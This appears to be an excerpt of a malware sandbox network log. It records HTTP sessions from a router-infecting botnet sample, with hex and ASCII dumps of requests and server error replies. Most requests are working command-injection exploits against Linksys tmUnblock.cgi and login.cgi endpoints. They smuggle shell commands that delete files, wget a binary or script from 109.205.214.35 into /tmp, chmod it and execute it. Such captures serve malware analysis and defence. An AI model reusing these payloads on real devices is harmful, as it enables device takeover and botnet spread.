                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 41 6d 61 6b 61 6e 6f 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Amakano.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
                                                        Mar 21, 2024 05:22:55.661108971 CET430OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 41 6d 61 6b 61 6e 6f 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Amakano.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        642192.168.2.1358786172.65.238.455555
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:45.766959906 CET438OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        643192.168.2.1360134113.61.199.48080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:45.855763912 CET442OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 41 6d 61 6b 61 6e 6f 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Amakano.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
                                                        Mar 21, 2024 05:22:50.028279066 CET442OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 41 6d 61 6b 61 6e 6f 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Amakano.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
                                                        Mar 21, 2024 05:22:50.385094881 CET78INHTTP/1.1 400 Bad Request
                                                        Connection: close
                                                        Content-Length: 0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        644192.168.2.135606049.13.155.15180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:46.462222099 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:46.674633980 CET495INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:22:46 GMT
                                                        Server: Apache/2.4.52 (Ubuntu)
                                                        Content-Length: 301
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at 127.0.1.1 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        645192.168.2.1360170113.61.199.48080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:46.531955957 CET69INHTTP/1.1 414 Request-URI Too Large
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        646192.168.2.1358808172.65.238.455555
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:46.767052889 CET438OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        647192.168.2.136074452.222.153.18780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:47.438571930 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:47.610351086 CET1275INHTTP/1.1 400 Bad Request
                                                        Server: CloudFront
                                                        Date: Thu, 21 Mar 2024 04:22:47 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 915
                                                        Connection: close
                                                        X-Cache: Error from cloudfront
                                                        Via: 1.1 32a3d8b90281de379fa6ae275a2021bc.cloudfront.net (CloudFront)
                                                        X-Amz-Cf-Pop: CDG52-P1
                                                        X-Amz-Cf-Id: _2NJCMYcM_lDPRm50FXLjtWFsbnaPLMBRFLsxcBZsMHvzEmRcP5LCQ==
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 54 49 54 4c 45 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 34 30 30 20 45 52 52 4f 52 3c 2f 48 31 3e 0a 3c 48 32 3e 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 2e 3c 2f 48 32 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 42 61 64 20 72 65 71 75 65 73 74 2e 0a 57 65 20 63 61 6e 27 74 20 63 6f 6e 6e 65 63 74 20 74 6f 20 74 68 65 20 73 65 72 76 65 72 20 66 6f 72 20 74 68 69 73 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 61 74 20 74 68 69 73 20 74 69 6d 65 2e 20 54 68 65 72 65 20 6d 69 67 68 74 20 62 65 20 74 6f 6f 20 6d 75 63 68 20 74 72 61 66 66 69 63 20 6f 72 20 61 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 65 72 72 6f 72 2e 20 54 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2c 20 6f 72 20 63 6f 6e 74 61 63 74 20 74 68 65 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 6f 77 6e 65 72 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 49 66 20 79 6f 75 20 70 72 6f 76 69 64 65 20 63 6f 6e 74 65 6e 74 20 74 6f 20 63 75 73 74 6f 6d 65 72 73 20 74 68 72 6f 75 67 68 20 43 6c 6f 75 64 46 72 6f 6e 74 2c 20 79 6f 75 20 63 61 6e 20 66 69 6e 64 20 73 74 65 70 73 20 74 6f 20 74 72 6f 75 62 6c 65 73 68 6f 6f 74 20 61 6e 64 20 68 65 6c 70 20 70 72 65 76 65 6e 74 20 74 68 69 73 20 65 72 72 6f 72 20 62 79 20 72 65 76 69 65 77 69 6e 67 20 74 68 65 20 43 6c 6f 75 64 46 72 6f 6e 74 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 3c 50 52 45 3e 0a 47 65 6e 65 72 61 74 65 64 20 62 79 20 63 6c 6f 75 64 66 72 6f 6e 74 20 28 43 6c 6f 75 64 46 72 6f 6e 74 29 0a 52 65 71 75 65 73 74 20 49 44 3a 20 5f 32 4e 4a 43 4d 59 63 4d 5f 6c 44 50 52 6d 35 30 46 58 4c 6a 74 57 46 73 62 6e 61 50 4c 4d 42 52 46 4c 73 78 63 42 5a 73 4d 48 76 7a 45 6d 52 63 50 35 4c 43 51 3d 3d 0a 3c 2f 50 52 45 3e 0a 3c 41 44 44 52 45 53 53 3e 0a 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"><TITLE>ERROR: The request could not be satisfied</TITLE></HEAD><BODY><H1>400 ERROR</H1><H2>The request could not be satisfied.</H2><HR noshade size="1px">Bad request.We can't connect to the server for this app or website at this time. There might be too much traffic or a configuration error. Try again later, or contact the app or website owner.<BR clear="all">If you provide content to customers through CloudFront, you can find steps to troubleshoot and help prevent this error by reviewing the CloudFront documentation.<BR clear="all"><HR noshade size="1px"><PRE>Generated by cloudfront (CloudFront)Request ID: _2NJCMYcM_lDPRm50FXLjtWFsbnaPLMBRFLsxcBZsMHvzEmRcP5LCQ==</PRE><ADDRESS></ADDRESS></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        648192.168.2.1352158212.76.114.12680
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:47.500669956 CET228OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        649192.168.2.134384844.213.30.23180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:47.531949997 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:47.823539019 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:47.916699886 CET284INHTTP/1.1 400 Bad Request
                                                        Server: awselb/2.0
                                                        Date: Thu, 21 Mar 2024 04:22:47 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 122
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        650192.168.2.1347384184.26.253.17880
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:47.537528992 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:47.795687914 CET534INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 312
                                                        Expires: Thu, 21 Mar 2024 04:22:47 GMT
                                                        Date: Thu, 21 Mar 2024 04:22:47 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 61 64 61 33 38 37 64 26 23 34 36 3b 31 37 31 30 39 39 34 39 36 37 26 23 34 36 3b 34 36 64 61 36 37 63 39 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 32 61 64 61 33 38 37 64 26 23 34 36 3b 31 37 31 30 39 39 34 39 36 37 26 23 34 36 3b 34 36 64 61 36 37 63 39 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;2ada387d&#46;1710994967&#46;46da67c9<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;2ada387d&#46;1710994967&#46;46da67c9</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        651192.168.2.133461054.230.187.15880
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:47.570530891 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:47.824027061 CET1275INHTTP/1.1 400 Bad Request
                                                        Server: CloudFront
                                                        Date: Thu, 21 Mar 2024 04:22:47 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 915
                                                        Connection: close
                                                        X-Cache: Error from cloudfront
                                                        Via: 1.1 b975fe7c5ea4d03e3d0250a217f79d38.cloudfront.net (CloudFront)
                                                        X-Amz-Cf-Pop: KIX56-C1
                                                        X-Amz-Cf-Id: voZiyThbkxT-yZpk1oNr4OktDsaXPa7DGbtKVtGYoO_nsiRHHPi_vQ==
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 54 49 54 4c 45 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 34 30 30 20 45 52 52 4f 52 3c 2f 48 31 3e 0a 3c 48 32 3e 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 2e 3c 2f 48 32 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 42 61 64 20 72 65 71 75 65 73 74 2e 0a 57 65 20 63 61 6e 27 74 20 63 6f 6e 6e 65 63 74 20 74 6f 20 74 68 65 20 73 65 72 76 65 72 20 66 6f 72 20 74 68 69 73 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 61 74 20 74 68 69 73 20 74 69 6d 65 2e 20 54 68 65 72 65 20 6d 69 67 68 74 20 62 65 20 74 6f 6f 20 6d 75 63 68 20 74 72 61 66 66 69 63 20 6f 72 20 61 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 65 72 72 6f 72 2e 20 54 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2c 20 6f 72 20 63 6f 6e 74 61 63 74 20 74 68 65 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 6f 77 6e 65 72 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 49 66 20 79 6f 75 20 70 72 6f 76 69 64 65 20 63 6f 6e 74 65 6e 74 20 74 6f 20 63 75 73 74 6f 6d 65 72 73 20 74 68 72 6f 75 67 68 20 43 6c 6f 75 64 46 72 6f 6e 74 2c 20 79 6f 75 20 63 61 6e 20 66 69 6e 64 20 73 74 65 70 73 20 74 6f 20 74 72 6f 75 62 6c 65 73 68 6f 6f 74 20 61 6e 64 20 68 65 6c 70 20 70 72 65 76 65 6e 74 20 74 68 69 73 20 65 72 72 6f 72 20 62 79 20 72 65 76 69 65 77 69 6e 67 20 74 68 65 20 43 6c 6f 75 64 46 72 6f 6e 74 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 3c 50 52 45 3e 0a 47 65 6e 65 72 61 74 65 64 20 62 79 20 63 6c 6f 75 64 66 72 6f 6e 74 20 28 43 6c 6f 75 64 46 72 6f 6e 74 29 0a 52 65 71 75 65 73 74 20 49 44 3a 20 76 6f 5a 69 79 54 68 62 6b 78 54 2d 79 5a 70 6b 31 6f 4e 72 34 4f 6b 74 44 73 61 58 50 61 37 44 47 62 74 4b 56 74 47 59 6f 4f 5f 6e 73 69 52 48 48 50 69 5f 76 51 3d 3d 0a 3c 2f 50 52 45 3e 0a 3c 41 44 44 52 45 53 53 3e 0a 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e
